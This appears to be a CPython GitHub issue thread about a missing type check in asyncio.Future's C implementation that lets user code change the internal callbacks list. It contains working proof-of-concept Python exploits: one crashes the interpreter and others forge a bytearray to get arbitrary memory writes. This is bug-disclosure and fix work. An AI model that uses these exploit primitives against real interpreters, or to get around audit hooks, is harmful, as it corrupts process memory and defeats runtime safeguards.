Lack of type checks in asyncio.Future can cause crash or the ability to craft malicious objects
Crash report
What happened?
In Modules/_asynciomodule.c the _asyncio_Future_remove_done_callback_impl function has a section where it retrieves an item from a list and then immediately assumes it's a tuple without doing any checks (this issue also exists in future_schedule_callbacks, but I'll only go over this one for brevity).
static PyObject *
_asyncio_Future_remove_done_callback_impl(FutureObj *self, PyTypeObject *cls,
PyObject *fn)
/*[clinic end generated code: output=2da35ccabfe41b98 input=c7518709b86fc747]*/
{
/* code not relevant to the bug ... */
// Beware: PyObject_RichCompareBool below may change fut_callbacks.
// See GH-97592.
for (i = 0;
self->fut_callbacks != NULL && i < PyList_GET_SIZE(self->fut_callbacks);
i++) {
int ret;
PyObject *item = PyList_GET_ITEM(self->fut_callbacks, i);
Py_INCREF(item);
ret = PyObject_RichCompareBool(PyTuple_GET_ITEM(item, 0), fn, Py_EQ);
if (ret == 0) {
if (j < len) {
PyList_SET_ITEM(newlist, j, item);
j++;
continue;
}
ret = PyList_Append(newlist, item);
}
Py_DECREF(item);
if (ret < 0) {
goto fail;
}
}
/* code not relevant to the bug ... */
}
We can see that it gets item i from fut_callbacks and then immediately assumes it's a tuple without doing any checks. This is fine if there's no way for the user to control fut_callbacks, but we can see the Future object has a _callbacks attribute which uses FutureObj_get_callbacks as its getter
static PyObject *
FutureObj_get_callbacks(FutureObj *fut, void *Py_UNUSED(ignored))
{
asyncio_state *state = get_asyncio_state_by_def((PyObject *)fut);
Py_ssize_t i;
ENSURE_FUTURE_ALIVE(state, fut)
if (fut->fut_callback0 == NULL) {
if (fut->fut_callbacks == NULL) {
Py_RETURN_NONE;
}
return Py_NewRef(fut->fut_callbacks);
}
/* code to copy the callbacks list and return it */
}
In the rare case that fut_callback0 is NULL and fut_callbacks isn't, this will actually return the real reference to fut_callbacks allowing us to modify the items in the list to be whatever we want. Here's a short POC to showcase a crash caused by this bug.
import asyncio
fut = asyncio.Future()
class Evil:
def __eq__(self, other):
global real_ref
real_ref = fut._callbacks
pad = lambda: ...
fut.add_done_callback(pad) # sets fut->fut_callback0
fut.add_done_callback(Evil()) # sets first item in fut->fut_callbacks list
# removes callback from fut->fut_callback0 setting it to null, but rest of the func checks the other callbacks which can call back to our python code
# aka our `__eq__` func letting us retrieve a real refernce to fut->fut_callbacks since fut_callback0 == NULL and fut_callbacks != NULL
fut.remove_done_callback(pad)
real_ref[0] = 0xDEADC0DE
# remove_done_callback will traverse all the callbacks in fut->fut_callbacks, meaning it will assume our 0xDEADC0DE int is a tuple and crash
fut.remove_done_callback(pad)
And if done carefully, this can be used to craft a malicious bytearray object which can write to anywhere in memory. Here's an example of that which works on 64-bit systems (tested on Windows and Linux)
import asyncio
fut = asyncio.Future()
class Evil:
# could split this into 2 different classes so one does the real_ref grab and the other does the mem set but thats boring
def __eq__(self, other):
global real_ref, mem
if self is e:
real_ref = fut._callbacks
else:
mem = other
return False
e = Evil()
pad = lambda: ...
fut.add_done_callback(pad) # sets fut->fut_callback0
fut.add_done_callback(e) # sets first item in fut->fut_callbacks list
# removes callback from fut->fut_callback0 setting it to null, but rest of the func checks the other callbacks which can call back to our python code
# aka our `__eq__` func letting us retrieve a real refernce to fut->fut_callbacks since fut_callback0 == NULL and fut_callbacks != NULL
fut.remove_done_callback(pad)
# set up fake bytearray obj
fake = (
(0x123456).to_bytes(8, 'little') +
id(bytearray).to_bytes(8, 'little') +
(2**63 - 1).to_bytes(8, 'little') +
(0).to_bytes(24, 'little')
)
# remove_done_callback will interpret this as a tuple, so it'll grab our fake obj instead
i2f = lambda num: 5e-324 * num
real_ref[0] = complex(0, i2f(id(fake) + bytes.__basicsize__ - 1))
# remove_done_callback will traverse all the callbacks in fut->fut_callbacks looking for this obj which will trigger our evil `__eq__` giving us our fake obj
fut.remove_done_callback(Evil())
# done
if "mem" not in globals():
print("Failed")
exit()
# should be an absurd number like 0x7fffffffffffffff
print(hex(len(mem)))
mem[id(250) + int.__basicsize__] = 100
print(250) # => 100
This can be fixed by making it impossible to get a real reference to the fut->fut_callbacks list, or just doing proper type checking in places where it's used.
CPython versions tested on:
3.11, 3.12, 3.13
Operating systems tested on:
Linux, Windows
Output from running 'python -VV' on the command line:
No response
Linked PRs
- gh-125833
- gh-125922
You can get the real reference to the callbacks list with something as simple as this, no need for the evil class I used in the initial report.
import asyncio
fut = asyncio.Future()
pad = lambda: ...
fut.add_done_callback(pad) # sets fut->fut_callback0
fut.add_done_callback(lambda x: 1) # sets first item in fut->fut_callbacks list
# removes callback from fut->fut_callback0 setting it to NULL
fut.remove_done_callback(pad)
for _ in range(10):
# will always be the same since it's now returning the real ref
print(hex(id(fut._callbacks)))
(As you observed) I don't think you necessarily need to get the real reference since you can just access it directly using fut._callbacks (being able to set it in the evil class means that you have access to the fut object itself).
You probably still need the evil class just to able to corrupt the interpreter's state though:
import asyncio
fut = asyncio.Future()
class evil:
def __eq__(self, other):
global mem
mem = other
return False
cb_pad = lambda: ...
fut.add_done_callback(cb_pad)
fut.add_done_callback(evil())
fut.remove_done_callback(cb_pad)
fake = (
(0x123456).to_bytes(8, 'little') +
id(bytearray).to_bytes(8, 'little') +
(2 ** 63 - 1).to_bytes(8, 'little') +
(0).to_bytes(24, 'little')
)
i2f = lambda num: 5e-324 * num
fut._callbacks[0] = complex(0, i2f(id(fake) + bytes.__basicsize__ - 1))
fut.remove_done_callback(evil())
mem[id(250) + int.__basicsize__] = 100
assert 250 == 100
By the way, we decided not to categorize this as a security issue because of the required capabilities an adversary would need to make it work (hence it will only be backported until 3.12 and not until 3.9):
- First, you need to find a code that does add/remove callbacks in a specific manner.
- Second, you need the code to somehow access a private attribute and be able to inject your payload.
@Nico-Posada If I'm missing something here or misunderstood your write-up, please enlighten me. AFAICT, the goal is to get some writable memory, yet this requires to play with fut._callbacks directly at some point on the victim's machine right?
Yeah, I never intended for it to be labeled as a security bug since you can do much more malicious things with the ability to execute arbitrary python code. The only other possible issue would be it being used to bypass audit hooks, but that would require the original program to have asyncio imported beforehand to be able to snag it from sys.modules.
The core problem here is that there's an edge case present when the C implementation doesn't returns a copy of callbacks, as such it can be mutated by user and can crash the interpreter or worse. This doesn't qualifies as a security issue as the user needs to have code to mutate the list in a specific order and "mess" around with the private '_callbacks'.
The fix I propose is to always return a copy of callbacks in C implementation in all cases so that internal code need not be concerned about mutations from user code to the list of callbacks. Fix at #125922